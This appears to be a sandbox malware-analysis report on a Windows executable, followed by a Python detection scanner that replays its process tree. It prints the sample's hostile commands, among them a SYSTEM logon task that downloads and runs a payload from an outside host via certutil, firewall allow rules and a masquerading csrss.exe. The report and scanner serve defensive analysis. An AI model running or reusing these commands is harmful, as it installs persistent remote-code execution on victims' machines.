Analysis
- max time kernel: 6s
- max time network: 77s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 23-05-2022 21:31

Static task: static1
Behavioral task: behavioral1
  Sample: ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe
  Resource: win10v2004-20220414-en
General
- Target: ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe
- Size: 3.8MB
- MD5: faded794f263120377f79cc3cf35e11d
- SHA1: 4add6c66e14478dbd953e05e0bce6844a702618f
- SHA256: ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982
- SHA512: b41885525518325a0f82753ea340cc7118ae32c8aba57ecce9136571e4fed7f2c4bca09ef990685413c03d9d920635194b2e0145e07d181541a3bc0bdb76c7b4
Malware Config
Signatures
- Modifies Windows Firewall (1 TTP)
- Modifies boot configuration data using bcdedit (1 IoC)
  Processes:
    pid    process
    3476   bcdedit.exe
- Program crash (2 IoCs)
  Processes:
    pid    pid_target   process        target process
    2576   2280         WerFault.exe   ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe
    424    2040         WerFault.exe   ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe
- Creates scheduled task(s) (1 TTP, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Processes:
    pid    process
    2836   schtasks.exe
    3404   schtasks.exe
Processes (indentation shows parent/child nesting; each entry gives the image path, then the command line, then any signature it triggered)

C:\Users\Admin\AppData\Local\Temp\ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe
  "C:\Users\Admin\AppData\Local\Temp\ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe"
  - C:\Users\Admin\AppData\Local\Temp\ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe
    "C:\Users\Admin\AppData\Local\Temp\ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe"
    - C:\Windows\system32\cmd.exe
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes"
      - C:\Windows\system32\netsh.exe
        netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes
    - C:\Windows\system32\cmd.exe
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
    - C:\Windows\rss\csrss.exe
      C:\Windows\rss\csrss.exe ""
      - C:\Windows\SYSTEM32\schtasks.exe
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
        signature: Creates scheduled task(s)
      - C:\Windows\SYSTEM32\schtasks.exe
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        signature: Creates scheduled task(s)
      - C:\Windows\system32\bcdedit.exe
        C:\Windows\Sysnative\bcdedit.exe /v
        signature: Modifies boot configuration data using bcdedit
      - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
    - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2040 -s 740
      signature: Program crash
  - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 620
    signature: Program crash

C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon

C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2280 -ip 2280

C:\Windows\system32\netsh.exe
  netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 2040 -ip 2040
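The process tree above carries everything the Signatures section summarises: two schtasks /CREATE calls (one staging a certutil download from https://gfixprice.space/app/app.exe to run at logon as SYSTEM), two netsh advfirewall allow rules for dropped binaries, a csrss.exe running from C:\Windows\rss rather than System32, and a bcdedit call. The Python below is an added example, not part of the Triage report or of the sample: it replays those command lines (transcribed from the tree; the report gives no pid for most entries, so none are assumed and the scanner keys on image paths and command lines only) through a small detection scanner of the kind a practitioner would run over Sysmon or EDR process-creation events. One caveat the signature label hides: bcdedit /v only lists boot entries verbosely, so the rule grades it low; a /set or similar write would be what to escalate on.

```python
import ntpath
import re
from typing import List, NamedTuple, Tuple

SAMPLE = (r"C:\Users\Admin\AppData\Local\Temp"
          r"\ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe")
DROPPED = r"C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe"
CSRSS = r"C:\Windows\rss\csrss.exe"
STAGED = r"C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe"

# (nesting depth, image path, command line), transcribed from the process tree
# in the report above. No pids are assumed; the scanner uses command lines only.
PROCESS_LOG: List[Tuple[int, str, str]] = [
    (1, SAMPLE, f'"{SAMPLE}"'),
    (2, SAMPLE, f'"{SAMPLE}"'),
    (3, r"C:\Windows\system32\cmd.exe",
     rf'C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule '
     rf'name="CloudNet" dir=in action=allow program="{DROPPED}" enable=yes"'),
    (4, r"C:\Windows\system32\netsh.exe",
     f'netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow '
     f'program="{DROPPED}" enable=yes'),
    (3, r"C:\Windows\system32\cmd.exe",
     rf'C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule '
     rf'name="csrss" dir=in action=allow program="{CSRSS}" enable=yes"'),
    (3, CSRSS, f'{CSRSS} ""'),
    (4, r"C:\Windows\SYSTEM32\schtasks.exe",
     'schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe '
     f'-urlcache -split -f https://gfixprice.space/app/app.exe {STAGED} && {STAGED} /31340" '
     '/TN ScheduledUpdate /F'),
    (4, r"C:\Windows\SYSTEM32\schtasks.exe",
     f'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "{CSRSS}" /TN csrss /F'),
    (4, r"C:\Windows\system32\bcdedit.exe", r"C:\Windows\Sysnative\bcdedit.exe /v"),
    (4, r"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"'),
    (3, r"C:\Windows\SysWOW64\WerFault.exe", r"C:\Windows\SysWOW64\WerFault.exe -u -p 2040 -s 740"),
    (2, r"C:\Windows\SysWOW64\WerFault.exe", r"C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 620"),
    (1, r"C:\Windows\system32\svchost.exe", r"C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon"),
    (1, r"C:\Windows\system32\netsh.exe",
     f'netsh advfirewall firewall add rule name="csrss" dir=in action=allow '
     f'program="{CSRSS}" enable=yes'),
]


class Finding(NamedTuple):
    rule: str
    detail: str
    severity: str


SCHTASKS_RE = re.compile(r"schtasks(?:\.exe)?\s+/CREATE\b(?P<args>.*)/TN\s+(?P<name>\S+)", re.I)
CERTUTIL_RE = re.compile(r"certutil(?:\.exe)?\s+-urlcache\b.*?-f\s+(?P<url>\S+)", re.I)
NETSH_RE = re.compile(r'netsh\s+advfirewall\s+firewall\s+add\s+rule\b.*?name="(?P<name>[^"]+)"'
                      r'.*?action=(?P<action>\w+).*?program="(?P<program>[^"]+)"', re.I)
# Core Windows process names malware commonly imitates; the genuine binary lives
# under one of SYSTEM_DIRS, so any other location is a masquerade candidate.
MASQUERADE_NAMES = {"csrss.exe", "smss.exe", "lsass.exe", "services.exe", "svchost.exe", "winlogon.exe"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
READ_ONLY_BCDEDIT = {"", "/v", "/enum"}  # enumeration switches that change nothing


def scan(records) -> List[Finding]:
    """Run the rules over every record and return de-duplicated findings in order."""
    findings: List[Finding] = []
    for _depth, image, cmdline in records:
        base = ntpath.basename(image).lower()
        folder = ntpath.dirname(image).lower()
        m = SCHTASKS_RE.search(cmdline)
        if m:
            args = m.group("args").upper()
            sev = "high" if "/RU SYSTEM" in args else "medium" if "/RL HIGHEST" in args else "low"
            findings.append(Finding("scheduled_task_persistence", m.group("name"), sev))
        m = CERTUTIL_RE.search(cmdline)
        if m:  # fires even when certutil is only staged inside a task's /TR action
            findings.append(Finding("certutil_download", m.group("url"), "high"))
        m = NETSH_RE.search(cmdline)
        if m and m.group("action").lower() == "allow":
            findings.append(Finding("firewall_allow_rule", f'{m.group("name")} -> {m.group("program")}', "medium"))
        if base in MASQUERADE_NAMES and not folder.startswith(SYSTEM_DIRS):
            findings.append(Finding("system_binary_masquerade", image, "high"))
        if base == "bcdedit.exe":
            parts = cmdline.split(None, 1)
            args = parts[1].strip() if len(parts) > 1 else ""
            sev = "low" if args.lower().split(" ")[0] in READ_ONLY_BCDEDIT else "medium"
            findings.append(Finding("bcdedit_invoked", args, sev))
    # The cmd.exe wrapper and its netsh.exe child carry the same command: collapse duplicates.
    unique: List[Finding] = []
    for f in findings:
        if f not in unique:
            unique.append(f)
    return unique


if __name__ == "__main__":
    for f in scan(PROCESS_LOG):
        print(f"[{f.severity:6}] {f.rule}: {f.detail}")
```

Against the transcribed tree this yields seven findings: both tasks (ScheduledUpdate graded high because of /RU SYSTEM, csrss medium for /RL HIGHEST alone), the certutil URL, the two firewall rules once each despite appearing in both the cmd.exe wrapper and its netsh.exe child, the out-of-place csrss.exe, and the read-only bcdedit /v.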
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
  Filesize: 272KB
  MD5: c4b96699047584583dbc95cc86788b0a
  SHA1: c64e88cc4d16723349deff660563def488a735c8
  SHA256: df6086d28af0d44baceb69a81b6a037932c5b779495f99573bc7c8797d43bd34
  SHA512: f6b11dcdcba9ed678ca2db3bfa649f8db44896b387da720562c2c16dfb30c1b0d7a3d235a50f23d65bf48dfd00d1773a6a2125af6d029020dbcb38d1c8d9baa6
- C:\Windows\rss\csrss.exe
  Filesize: 399KB
  MD5: 794f5c41d565d7e50eb863cf1c059c54
  SHA1: 3d3c8db7e91625fdf656442984d1b55a71d83f5b
  SHA256: f8af516ec0e0d64381bf7cb2b8d3d8cee910c4b2c42ce0f4920b94377f728f5d
  SHA512: 60f49a884b5948b596222552cfc16ddac118ec4e2c732e856728ff80ffa34a289a536cffd26957d5835d1bcf301cca415ae258e018aa3534de30ec36888bf203
- C:\Windows\rss\csrss.exe
  Filesize: 253KB
  MD5: a3c8e6a1e954fdf0014aee5d896a0655
  SHA1: 366d412275b7fa117eff7f76c5bbe045417e2be1
  SHA256: c782d874a603c001d1bb28913d33f8db846d4395a847f13e7763af47417a62e8
  SHA512: 1620603f9d0972bbdf1bbfb609ca38b3b9ec5691746678501385396d2ff3e1edb174fe47084107a663e8958dc46c54c3993d1c7723080b85d10c1b277431a8ef
- memory/876-138-0x0000000000000000-mapping.dmp
- memory/1852-145-0x0000000000400000-0x0000000000BFB000-memory.dmp  Filesize: 8.0MB
- memory/1852-140-0x0000000000000000-mapping.dmp
- memory/1852-144-0x0000000001800000-0x0000000001EF5000-memory.dmp  Filesize: 7.0MB
- memory/1852-143-0x0000000001400000-0x00000000017A6000-memory.dmp  Filesize: 3.6MB
- memory/2040-134-0x0000000000EF1000-0x0000000001297000-memory.dmp  Filesize: 3.6MB
- memory/2040-135-0x0000000000400000-0x0000000000BFB000-memory.dmp  Filesize: 8.0MB
- memory/2040-133-0x0000000000000000-mapping.dmp
- memory/2132-137-0x0000000000000000-mapping.dmp
- memory/2280-132-0x0000000000400000-0x0000000000BFB000-memory.dmp  Filesize: 8.0MB
- memory/2280-130-0x0000000000E6C000-0x0000000001212000-memory.dmp  Filesize: 3.6MB
- memory/2280-131-0x0000000001220000-0x0000000001915000-memory.dmp  Filesize: 7.0MB
- memory/2352-148-0x0000000000000000-mapping.dmp
- memory/2836-147-0x0000000000000000-mapping.dmp
- memory/2980-139-0x0000000000000000-mapping.dmp
- memory/3404-146-0x0000000000000000-mapping.dmp
- memory/3476-150-0x0000000000000000-mapping.dmp
- memory/4216-136-0x0000000000000000-mapping.dmp